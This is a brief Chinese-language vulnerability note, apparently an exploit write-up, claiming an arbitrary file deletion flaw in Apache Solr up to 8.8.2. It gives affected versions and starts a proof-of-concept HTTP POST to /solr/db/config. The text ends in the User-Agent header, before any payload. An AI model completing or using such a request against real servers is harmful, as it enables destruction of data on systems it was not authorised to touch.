# Apache Solr<= 8.8.2 (最新) 任意文件删除
Apache Solr全版本存在任意文件删除漏洞,在Solr默认安装后无需任何其它配置即可删除系统任意文件。
影响版本:
Apache Solr < = 8.8.2
poc:
```
POST /solr/db/config HTTP/1.1
Host: 192.168.33.130:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20